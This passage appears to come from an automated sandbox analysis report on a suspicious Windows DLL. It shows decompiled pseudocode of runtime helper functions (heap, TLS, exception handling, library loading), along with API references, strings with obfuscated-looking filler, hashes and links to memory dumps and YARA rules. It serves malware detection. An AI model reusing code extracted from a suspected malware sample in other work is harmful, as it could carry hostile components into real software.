								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6eade128 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6EAA92F0(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6EA81000(_v52, _v48);
						return E6EA81000(_v40, 0xf);
					} else {
						 *0x6eade128 = _t45;
						goto L3;
					}
				}
				L21:
			}

0x6ea810a0
0x6ea810a0
0x6ea810a0
0x6ea810a3
0x6ea810a4
0x6ea810a5
0x6ea810a6
0x6ea810a9
0x6ea810ac
0x6ea810b3
0x6ea810c4
0x6ea810c7
0x6ea810cd
0x6ea810d4
0x6ea810e8
0x6ea810ed
0x6ea810f4
0x00000000
0x6ea810fa
0x6ea810fa
0x6ea81102
0x6ea8110a
0x6ea8110d
0x6ea81112
0x6ea81116
0x6ea8111d
0x6ea81131
0x6ea81136
0x6ea8113d
0x00000000
0x6ea81143
0x6ea81143
0x6ea8114b
0x6ea81153
0x6ea81155
0x6ea8115a
0x6ea8115d
0x6ea81164
0x6ea81169
0x6ea81192
0x6ea81195
0x6ea81198
0x00000000
0x00000000
0x6ea8119a
0x6ea8119a
0x6ea811a0
0x6ea811a2
0x6ea81235
0x6ea8123c
0x6ea81241
0x00000000
0x6ea811a8
0x6ea811ab
0x6ea811ad
0x6ea811b5
0x6ea811b8
0x6ea811bb
0x6ea811c2
0x6ea811c5
0x6ea811ca
0x6ea811cd
0x6ea811d0
0x6ea811d3
0x6ea811d6
0x6ea811d6
0x6ea81171
0x6ea81175
0x6ea8117e
0x6ea81180
0x6ea81185
0x6ea81188
0x6ea8118a
0x6ea8118d
0x6ea81191
0x00000000
0x6ea81191
0x00000000
0x6ea811a2
0x6ea811db
0x6ea811e5
0x6ea811f2
0x6ea811fa
0x6ea811fe
0x6ea8120b
0x6ea8120b
0x6ea8121b
0x6ea81220
0x6ea81223
0x6ea81230
0x6ea81230
0x6ea8111f
0x6ea8111f
0x6ea81126
0x6ea8124a
0x6ea8124a
0x00000000
0x6ea8112c
0x6ea8112c
0x00000000
0x6ea8112c
0x6ea81126
0x6ea8111d
0x6ea810d6
0x6ea810d6
0x6ea810dd
0x6ea81243
0x6ea81243
0x6ea8124f
0x6ea81254
0x6ea81259
0x6ea81264
0x6ea8126d
0x6ea81283
0x6ea810e3
0x6ea810e3
0x00000000
0x6ea810e3
0x6ea810dd
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6EA810D6
HeapAlloc.KERNEL32(02D40000,00000000,0000000F), ref: 6EA810ED
GetProcessHeap.KERNEL32(02D40000,00000000,0000000F), ref: 6EA8111F
HeapAlloc.KERNEL32(02D40000,00000000,00000010,02D40000,00000000,0000000F), ref: 6EA81136
HeapFree.KERNEL32(00000000,?,00000000,00000010,02D40000,00000000,0000000F), ref: 6EA8120B
HeapFree.KERNEL32(00000000,?,00000000,00000010,02D40000,00000000,0000000F), ref: 6EA8121B

Strings

Control_RunDLL, xrefs: 6EA81102
Control_RunDLL, xrefs: 6EA8114B

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: 08a2fb121053f1ecc40317549d7bc88e86d1f26f06ffe0b7e8146a5c76d51172
Instruction ID: 72fe35517294f1f54e64564e71b980ef5e8565c3385234994d70defc67fdeb78
Opcode Fuzzy Hash: 08a2fb121053f1ecc40317549d7bc88e86d1f26f06ffe0b7e8146a5c76d51172
Instruction Fuzzy Hash: CC519C75E007099BDB00CFE8CD40BEEB7B9FB99704F148529E8157B241E775A885CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9EF20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6EA9EF20(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E6EAA9200(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x6eadd804;
				E6EA9EEE0(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x6eadd804);
				E6EAA021C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E6EAA03A0(_t80, 0xfffffffe, _t103, 0x6eadd804);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E6EAA0340(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E6EA9EEE0(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x6ead5704;
											if(__eflags != 0) {
												_t75 = E6EAA9060(__eflags, 0x6ead5704);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x6ead5704; // 0x6ea9f131
													 *0x6eaaa154(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E6EAA0380(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E6EAA03A0(_t68, _t100, _t103, 0x6eadd804);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E6EA9EEE0(_t80, _t95, _t100, _t103, _v12);
										E6EAA0360();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x6ea9ef20
0x6ea9ef27
0x6ea9ef2b
0x6ea9ef2c
0x6ea9ef32
0x6ea9ef3e
0x6ea9ef40
0x6ea9ef46
0x6ea9ef46
0x6ea9ef4f
0x6ea9ef51
0x6ea9ef54
0x6ea9ef57
0x6ea9ef5f
0x6ea9ef64
0x6ea9ef67
0x6ea9ef6a
0x6ea9ef71
0x6ea9efcd
0x6ea9efd0
0x6ea9efd8
0x6ea9efdf
0x00000000
0x6ea9efdf
0x00000000
0x6ea9ef73
0x6ea9ef73
0x6ea9ef79
0x6ea9ef7f
0x6ea9ef85
0x6ea9eff0
0x6ea9eff9
0x6ea9ef87
0x6ea9ef87
0x6ea9ef87
0x6ea9ef8d
0x6ea9ef90
0x6ea9ef93
0x6ea9ef96
0x6ea9ef99
0x6ea9ef9e
0x6ea9efb4
0x00000000
0x6ea9efa0
0x6ea9efa0
0x6ea9efa2
0x6ea9efa7
0x6ea9efa9
0x6ea9efac
0x6ea9efae
0x6ea9efc4
0x6ea9efe4
0x6ea9efe4
0x6ea9efe8
0x00000000
0x6ea9efb0
0x6ea9efb0
0x6ea9effa
0x6ea9effd
0x6ea9f003
0x6ea9f005
0x6ea9f00c
0x6ea9f013
0x6ea9f018
0x6ea9f01b
0x6ea9f01d
0x6ea9f01f
0x6ea9f02c
0x6ea9f032
0x6ea9f034
0x6ea9f037
0x6ea9f037
0x6ea9f03a
0x6ea9f03a
0x6ea9f00c
0x6ea9f040
0x6ea9f042
0x6ea9f047
0x6ea9f04a
0x6ea9f04d
0x6ea9f055
0x6ea9f059
0x6ea9f05e
0x6ea9f05e
0x6ea9f061
0x6ea9f065
0x6ea9f068
0x6ea9f078
0x6ea9f07d
0x6ea9f081
0x6ea9f084
0x6ea9f087
0x6ea9f089
0x6ea9f08f
0x6ea9f092
0x6ea9f092
0x6ea9f095
0x6ea9f095
0x6ea9f097
0x6ea9f099
0x00000000
0x00000000
0x6ea9f09b
0x6ea9f09d
0x00000000
0x6ea9f09f
0x6ea9f09f
0x6ea9f0a2
0x6ea9f0a5
0x00000000
0x6ea9f0a7
0x6ea9f0a7
0x6ea9f0aa
0x6ea9f0ad
0x6ea9f0af
0x00000000
0x6ea9f0b1
0x00000000
0x6ea9f0b1
0x6ea9f0af
0x6ea9f0a5
0x00000000
0x6ea9f09d
0x6ea9f0b3
0x6ea9f0b5
0x6ea9f0b5
0x6ea9f0b9
0x6ea9f08b
0x6ea9f08b
0x6ea9f08b
0x6ea9f08e
0x6ea9f08e
0x6ea9efb2
0x00000000
0x6ea9efb2
0x6ea9efb0
0x6ea9efae
0x00000000
0x6ea9efb7
0x6ea9efb7
0x6ea9efb9
0x6ea9efc0
0x00000000
0x6ea9efc2
0x00000000
0x6ea9efc0
0x6ea9ef85
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6EA9EF57
___except_validate_context_record.LIBVCRUNTIME ref: 6EA9EF5F
_ValidateLocalCookies.LIBCMT ref: 6EA9EFE8
__IsNonwritableInCurrentImage.LIBCMT ref: 6EA9F013
_ValidateLocalCookies.LIBCMT ref: 6EA9F068

Strings

csm, xrefs: 6EA9EFFD

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 73fe88f51fb2c00416c2a873e614a570edc4f8b4a920feb23b7b9270b9077ff9
Instruction ID: 616f9f5e603c2a9aa4880c44a80c882a0f21c72d1379554d7087ff51825c1b48
Opcode Fuzzy Hash: 73fe88f51fb2c00416c2a873e614a570edc4f8b4a920feb23b7b9270b9077ff9
Instruction Fuzzy Hash: FE419534A20219EFCF00CFACC880A9EBBF9BF45328F14C55AE9149B352D7319995CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA92960, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6EA92960(void* __ebx, long* __ecx, void* __edi, void* __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				long _v76;
				intOrPtr _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				intOrPtr _v104;
				char _v108;
				void* __ebp;
				long _t41;
				void* _t47;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void _t56;
				void* _t65;
				long _t70;
				long* _t73;
				void* _t77;
				intOrPtr _t78;
				void* _t87;

				_t78 = _t77 - 0x5c;
				_v32 = _t78;
				_v20 = 0xffffffff;
				_v24 = E6EA93A60;
				_t73 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				__imp__AcquireSRWLockExclusive(0x6eade114, __esi, __edi, __ebx);
				_v36 = 0x6eade114;
				_t70 =  *__ecx;
				if(_t70 != 0) {
					L10:
					__imp__ReleaseSRWLockExclusive(_v36);
					 *[fs:0x0] = _v28;
					return _t70;
				} else {
					_t7 =  &(_t73[1]); // 0x6ea92f50
					_t56 =  *_t7;
					_t41 = TlsAlloc();
					if(_t41 == 0xffffffff) {
						_v20 = 0;
						E6EAA94E0(_t56, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx", 0x2e, _t70, _t73, __eflags, 0x6ead061c);
						_t78 = _t78 + 4;
						asm("ud2");
						goto L12;
					} else {
						_t70 = _t41;
						if(_t56 == 0) {
							L9:
							 *_t73 = _t70;
							if(_t70 == 0) {
								L12:
								_v108 = 0x6eacff5c;
								_v104 = 1;
								_v100 = 0;
								_v92 = 0x6eacf570;
								_v84 = 0x6eacfdb4;
								_v80 = 2;
								_v40 = 0;
								_v44 = 0;
								_v88 = 0;
								_v76 = 0;
								_v20 = 0;
								_v60 =  &_v108;
								_v56 = E6EA82110;
								_v68 =  &_v60;
								_v64 = 1;
								_v52 = E6EA8D0F0( &_v44, __eflags);
								_v48 =  &_v84;
								E6EA8D2B0( &_v52);
								asm("int 0x29");
								asm("ud2");
								goto L13;
							} else {
								goto L10;
							}
						} else {
							_t51 =  *0x6eade128; // 0x2d40000
							if(_t51 != 0) {
								L6:
								_t52 = HeapAlloc(_t51, 0, 0xc);
								_t87 = _t52;
								if(_t87 == 0) {
									goto L13;
								} else {
									 *_t52 = _t56;
									 *(_t52 + 4) = _t70;
									 *(_t52 + 8) = 0;
									_t65 = _t52;
									_t53 =  *0x6eade12c; // 0x0
									do {
										 *((intOrPtr*)(_t65 + 8)) = _t53;
										asm("lock cmpxchg [0x6eade12c], ecx");
									} while (_t87 != 0);
									goto L9;
								}
							} else {
								_t51 = GetProcessHeap();
								if(_t51 == 0) {
									L13:
									_t47 = E6EAA92F0(_t56, 0xc, 4, _t70, _t73, __eflags);
									asm("ud2");
									__eflags =  &_a8;
									return E6EA8C6B0(_t47,  &_v36);
								} else {
									 *0x6eade128 = _t51;
									goto L6;
								}
							}
						}
					}
				}
			}

0x6ea92966
0x6ea92969
0x6ea9296c
0x6ea92973
0x6ea9297a
0x6ea92986
0x6ea92989
0x6ea92994
0x6ea9299a
0x6ea929a1
0x6ea929a5
0x6ea92a15
0x6ea92a18
0x6ea92a21
0x6ea92a30
0x6ea929a7
0x6ea929a7
0x6ea929a7
0x6ea929aa
0x6ea929b3
0x6ea92a31
0x6ea92a47
0x6ea92a4c
0x6ea92a4f
0x00000000
0x6ea929b5
0x6ea929b5
0x6ea929b9
0x6ea92a0d
0x6ea92a11
0x6ea92a13
0x6ea92a51
0x6ea92a5a
0x6ea92a61
0x6ea92a68
0x6ea92a6f
0x6ea92a76
0x6ea92a7d
0x6ea92a84
0x6ea92a88
0x6ea92a8f
0x6ea92a96
0x6ea92a9d
0x6ea92aa4
0x6ea92aaa
0x6ea92ab1
0x6ea92ab4
0x6ea92ac3
0x6ea92ac6
0x6ea92ac9
0x6ea92ad3
0x6ea92ad5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea929bb
0x6ea929bb
0x6ea929c2
0x6ea929d6
0x6ea929db
0x6ea929e0
0x6ea929e2
0x00000000
0x6ea929e8
0x6ea929e8
0x6ea929ea
0x6ea929ed
0x6ea929f4
0x6ea929f6
0x6ea92a00
0x6ea92a00
0x6ea92a03
0x6ea92a03
0x00000000
0x6ea92a00
0x6ea929c4
0x6ea929c4
0x6ea929cb
0x6ea92ad7
0x6ea92ae1
0x6ea92ae6
0x6ea92af4
0x6ea92b03
0x6ea929d1
0x6ea929d1
0x00000000
0x6ea929d1
0x6ea929cb
0x6ea929c2
0x6ea929b9
0x6ea929b3

APIs

AcquireSRWLockExclusive.KERNEL32(6EADE114), ref: 6EA92994
TlsAlloc.KERNEL32 ref: 6EA929AA
GetProcessHeap.KERNEL32 ref: 6EA929C4
HeapAlloc.KERNEL32(02D40000,00000000,0000000C), ref: 6EA929DB
ReleaseSRWLockExclusive.KERNEL32(6EADE114), ref: 6EA92A18

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6EA92A38

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
API String ID: 3228198226-3009553730
Opcode ID: 3be2a5b88d2db881433e624f7beae2a1a03bd5ad7a4b2dd9a962b3454fc25349
Instruction ID: 39662a4ae29564760728e3c6b7c3d3a37857702be76468acb0300fa66d9b351d
Opcode Fuzzy Hash: 3be2a5b88d2db881433e624f7beae2a1a03bd5ad7a4b2dd9a962b3454fc25349
Instruction Fuzzy Hash: 604148B19003098FDB10CFD4D945B9EBBF5FB45318F144129E519AB280EB759889CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA42BC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EAA42BC(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6eade860 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6ead66b0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6eade860 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6eade860 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6EAA1EF8(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6EAA1EF8(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x6eaa42c5
0x6eaa435a
0x6eaa42cd
0x6eaa42cf
0x6eaa42d9
0x6eaa42de
0x6eaa42eb
0x6eaa4300
0x6eaa4304
0x6eaa436a
0x6eaa436f
0x6eaa4376
0x6eaa437a
0x6eaa437d
0x6eaa437d
0x6eaa4383
0x6eaa4383
0x6eaa4365
0x6eaa4369
0x6eaa4369
0x6eaa4306
0x6eaa430f
0x6eaa4348
0x6eaa4355
0x6eaa4357
0x6eaa4357
0x00000000
0x6eaa4357
0x6eaa4319
0x6eaa431e
0x6eaa4323
0x00000000
0x00000000
0x6eaa432d
0x6eaa4332
0x6eaa4337
0x00000000
0x00000000
0x6eaa433c
0x6eaa4342
0x6eaa4346
0x00000000
0x00000000
0x00000000
0x6eaa4346
0x6eaa42e3
0x00000000
0x00000000
0x00000000
0x6eaa42e9
0x6eaa4363
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,6EAA43C9,FFFDC801,00000400,?,00000000,00000001,?,6EAA4542,00000021,FlsSetValue,6EAD6BF8,6EAD6C00,?), ref: 6EAA437D

Strings

api-ms-, xrefs: 6EAA4313
ext-ms-, xrefs: 6EAA4327

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 4939a08324356b1031348104d6e1c19a980e651ed0e9fcd5aaae04d1866296ba
Instruction ID: 4bca6baf93bd27b7e4fdcf47df6efff1eac70d51fb8f8ab41ca552f04cfacaff
Opcode Fuzzy Hash: 4939a08324356b1031348104d6e1c19a980e651ed0e9fcd5aaae04d1866296ba
Instruction Fuzzy Hash: 21212B35940712ABDB219AADCC44A5E7768EB43360F164154FE25BB280DF30ED47C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F3BF, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EA9F3BF(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6eadd820 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6EAA057B(_t13, __eflags,  *0x6eadd820);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6EAA05B6(_t14, __eflags,  *0x6eadd820, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6EAA1CC1();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6EAA05B6(_t18, __eflags,  *0x6eadd820, 0);
								} else {
									_t8 = E6EAA05B6(_t18, __eflags,  *0x6eadd820, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6EAA1C08(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6ea9f3bf
0x6ea9f3c6
0x6ea9f3d9
0x6ea9f3e0
0x6ea9f3e2
0x6ea9f3e3
0x6ea9f3e6
0x6ea9f3ff
0x6ea9f3ff
0x6ea9f3e8
0x6ea9f3e8
0x6ea9f3ea
0x6ea9f3f4
0x6ea9f3fb
0x6ea9f3fd
0x6ea9f404
0x6ea9f40d
0x6ea9f410
0x6ea9f411
0x6ea9f413
0x6ea9f427
0x6ea9f427
0x6ea9f430
0x6ea9f415
0x6ea9f41c
0x6ea9f422
0x6ea9f423
0x6ea9f425
0x6ea9f439
0x6ea9f43b
0x6ea9f43b
0x00000000
0x00000000
0x00000000
0x6ea9f425
0x6ea9f43e
0x00000000
0x00000000
0x00000000
0x6ea9f3fd
0x6ea9f3ea
0x6ea9f446
0x6ea9f450
0x6ea9f3c8
0x6ea9f3ca
0x6ea9f3ca

APIs

GetLastError.KERNEL32(00000001,?,6EA9F101,6EA9CFA2,6EA9C7AC,?,6EA9C9E4,?,00000001,?,?,00000001,?,6EADAFA8,0000000C,6EA9CADD), ref: 6EA9F3CD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA9F3DB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EA9F3F4
SetLastError.KERNEL32(00000000,6EA9C9E4,?,00000001,?,?,00000001,?,6EADAFA8,0000000C,6EA9CADD,?,00000001,?), ref: 6EA9F446

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ed11e0431ae9a7b55614d2903f3490de827a5b29a9665a7e8039d34c3f0f2487
Instruction ID: fee08105661e597c7e0b46ec5ec51367d69b08245786e621a1f41536af8a284f
Opcode Fuzzy Hash: ed11e0431ae9a7b55614d2903f3490de827a5b29a9665a7e8039d34c3f0f2487
Instruction Fuzzy Hash: 1801F936168B125DEA613AF85D8466B3EE8EB46274730832DF920651D0FF114C92AA48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9BE60, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 6EA9C510: GetTickCount64.KERNEL32 ref: 6EA9C517

GetTickCount64.KERNEL32 ref: 6EA9BE96
GetTickCount64.KERNEL32 ref: 6EA9BEB4
GetTickCount64.KERNEL32 ref: 6EA9BECD
GetTickCount64.KERNEL32 ref: 6EA9BECF
GetTickCount64.KERNEL32 ref: 6EA9BED6
GetTickCount64.KERNEL32 ref: 6EA9BEF4

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: dba2ff9360f87b1edf8369a11c87ca8840a9c0efa795440764ddbd28e5113fb6
